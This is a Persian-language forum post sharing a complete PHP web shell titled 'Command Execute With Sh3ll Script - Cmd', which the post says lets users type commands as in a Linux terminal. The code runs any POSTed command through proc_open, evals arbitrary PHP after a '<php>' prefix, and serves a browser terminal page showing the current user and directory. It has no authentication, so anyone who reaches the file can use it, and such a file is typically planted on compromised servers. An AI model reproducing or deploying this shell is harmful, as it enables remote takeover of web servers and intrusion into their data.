SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Command Execute With Sh3ll Script - Cmd

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Command Execute With Sh3ll Script - Cmd

    با این اسکریپ کد همانند ترمینال لینوکس دستورات خود را وارد نمایید .

    کد:
    <?php
//disable magic quotes!!
error_reporting(E_ALL^E_NOTICE);
$tf = explode('/', $_SERVER["SCRIPT_NAME"]);
$tf = $tf[count($tf)-1];
if (get_magic_quotes_gpc())
{
 $process = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
 while (list($key, $val) = each($process))
 {
  foreach ($val as $k => $v)
  {
   unset($process[$key][$k]);
   if (is_array($v))
   {
    $process[$key][stripslashes($k)] = $v;
    $process[] = &$process[$key][stripslashes($k)];
   }
   else
   {
    $process[$key][stripslashes($k)] = stripslashes($v);
   }
  }
 }
 unset($process);
}
//
function shell_exec2($str, $cwd)
{
 $pipes = array();
 $process = proc_open($str.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, $cwd);
 return stream_get_contents($pipes[1]);
}
if ($_POST['verify'])
{
 $dirnow = shell_exec2("pwd", $_POST['verify']);
 if (substr($dirnow, 0, strlen($dirnow)-1)==$_POST['verify'])
 {
  echo('document.getElementById("command").value += "\n";  newcmd();');
 }
 else
 {
  $ee = explode('/', $_POST['verify']);
  echo('document.getElementById("command").value += "\nbash: cd: '.$_POST['verify'].': Permission denied!\n";  newcmd();');
 }
 exit;
}
if ($_POST['jxcmd'] && $_POST['cwd']) //yea, go AJAX
{
 $thecmd = $_POST['jxcmd'];
 if (substr($thecmd, 0, 5)=="<php>")
 {
  eval('$result = '.substr($thecmd, 6).';');
 }
 else
 $result = shell_exec2($_POST['jxcmd']." 2>&1", $_POST['cwd']);
 if (substr($result, strlen($result)-1, 1)=="\n")
 {
  $result = substr($result, 0, strlen($result)-1);
 }
 echo('document.getElementById("command").value+='.json_encode($result).'+"\n";newcmd();document.getElementById("command").scrollTop=document.getElementById("command").scrollHeight;');
 exit;
}
echo('<style>body {background-color: black; color: white; font-size: 12px;}</style><script>'); ?>
window.onload = setthesize;
window.onresize = setthesize;
window.updir = 0;
window.commands = new Array();
window.loggeduser = "<?php
$cmd = shell_exec2("whoami", NULL);
if (strpos($cmd, "not found")===FALSE)
{
 echo(substr($cmd, 0, strlen($cmd)-1)); 
}
?>";
window.cwd = "<?php
$cmd = shell_exec2("pwd", NULL);
if (strpos($cmd, "not found")===FALSE)
{
 echo(substr($cmd, 0, strlen($cmd)-1)); 
}
?>";
window.homecwd = "<?php
$cmd = shell_exec2("pwd", NULL);
if (strpos($cmd, "not found")===FALSE)
{
 echo(substr($cmd, 0, strlen($cmd)-1)); 
}
?>";
function setthesize()
{
 document.getElementById("command").style.height=(window.innerHeight-20)+"px";
 document.getElementById("command").style.width=(window.innerWidth-20)+"px";
 document.getElementById("command").selectionStart=document.getElementById("command").value.length;
 document.getElementById("command").selectionEnd=document.getElementById("command").value.length;
 document.getElementById("command").focus();
}
function appenddirectory(str)
{
 if (str.substr(0, 1)=="/")
 window.cwd = str;
 else
 {
  var c = window.cwd+"/"+str;
  var real = new Array();
  c = c.split("/"); var i;
  for(i=0;i<c.length;i++)
  {
   if ((c[i] == "..") && real.length>0)
   {
    real.splice(real.length-1, 1);
   }
   else if ((c[i] != ".") && (c[i] != ""))
   real.push(c[i]);
  }
  window.cwd = "/"+real.join("/");
 }
}
function writelastline(str)
{
 var call = document.getElementById("command").value.split("\n"), i;
 call[call.length-1] = str;
 document.getElementById("command").value = call.join("\n");
}
function cmdup(e)
{
 if (window.commands.length>(window.updir))
 {
  window.updir++;
  writelastline("");
  newcmd();
  document.getElementById("command").value += window.commands[window.commands.length-window.updir];
 }
 if (e.stopPropagation)
 {
  e.stopPropagation();
  e.preventDefault();
 }
 document.getElementById("command").scrollTop=document.getElementById("command").scrollHeight;
}
function cmdown(e)
{
 if (window.updir>1)
 {
  window.updir--;
  writelastline("");
  newcmd();
  document.getElementById("command").value += window.commands[window.commands.length-window.updir];
 }
 if (e.stopPropagation)
 {
  e.stopPropagation();
  e.preventDefault();
 }
 document.getElementById("command").scrollTop=document.getElementById("command").scrollHeight;
}
function postAsynchronousAjax(url, values)
{
 var xmlhttp;
 if (window.XMLHttpRequest)
 {
  xmlhttp=new XMLHttpRequest()
  xmlhttp.open("POST",url,true);
  xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xmlhttp.send(values);
  xmlhttp.onreadystatechange=function()
  {
   if (xmlhttp.readyState==4)
   {
    if (xmlhttp.status==200)
    {
     eval(xmlhttp.responseText);
    }
   }
  }
 }
 else if (window.ActiveXObject)
 {
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
  if (xmlhttp)
  {
   xmlhttp.open("POST",url,true);
   xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
   xmlhttp.send(values);
   xmlhttp.onreadystatechange=function()
   {
    if (xmlhttp.readyState==4)
    {
     if (xmlhttp.status==200)
     {
      eval(xmlhttp.responseText);
     }
    }
   }
  }
 }
}
function urlencode (str)
{
 return encodeURIComponent(str).replace(/!/g, '%21').replace(/'/g, '%27').replace(/\(/g, '%28').
 replace(/\)/g, '%29').replace(/\*/g, '%2A').replace(/%20/g, '+');
}
function newcmd()
{
 document.getElementById("command").value += "["+window.loggeduser+"@<?php echo($_SERVER['HTTP_HOST']); ?> "+((window.cwd=="/")?("/"):(window.cwd.split("/")[window.cwd.split("/").length-1]))+"]# ";
 document.getElementById("command").scrollTop=document.getElementById("command").scrollHeight;
}
function exec(e)
{
 window.updir=0;
 var all = document.getElementById("command").value.split("\n");
 if (all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(2)=="clear")
 {
  window.commands = new Array();
  document.getElementById("command").value="";
  newcmd();
  e.preventDefault();
 }
 else if (all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(2, 2)=="cd")
 {
  e.preventDefault();
  window.commands.push(all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(2));
  if (all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(5)=="~")
  {
   window.cwd = window.homecwd;
   document.getElementById("command").value += "\n";  newcmd();
  }
  else
  {
   appenddirectory(all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(5));
   postAsynchronousAjax("<?php echo($tf); ?>", "verify="+urlencode(window.cwd));
  }
 }
 else
 {
  e.preventDefault();
  document.getElementById("command").value += "\n";
  window.commands.push(all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(2));
  postAsynchronousAjax("<?php echo($tf); ?>", "jxcmd="+urlencode(all[all.length-1].substr(all[all.length-1].indexOf("#")).substr(2))+"&cwd="+window.cwd);
 }
 document.getElementById("command").scrollTop=document.getElementById("command").scrollHeight;
}
function bsp(e)
{
 var all = document.getElementById("command").value.split("\n");
 if (all[all.length-1].length==(all[all.length-1].indexOf("#")+2))
 e.preventDefault();
}
<?php echo('function parsekey(e, ths){if (e.keyCode==13){exec(e);}else if(e.keyCode==38){cmdup(e);return false;}else if(e.keyCode==40){cmdown(e);return false;}else if(e.keyCode==8){bsp(e);}}</script><textarea rows=7 cols=130 id="command" onkeypress="parsekey(event, this);"></textarea><br>');?>
<script>
newcmd();
</script>
    [align=center][/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X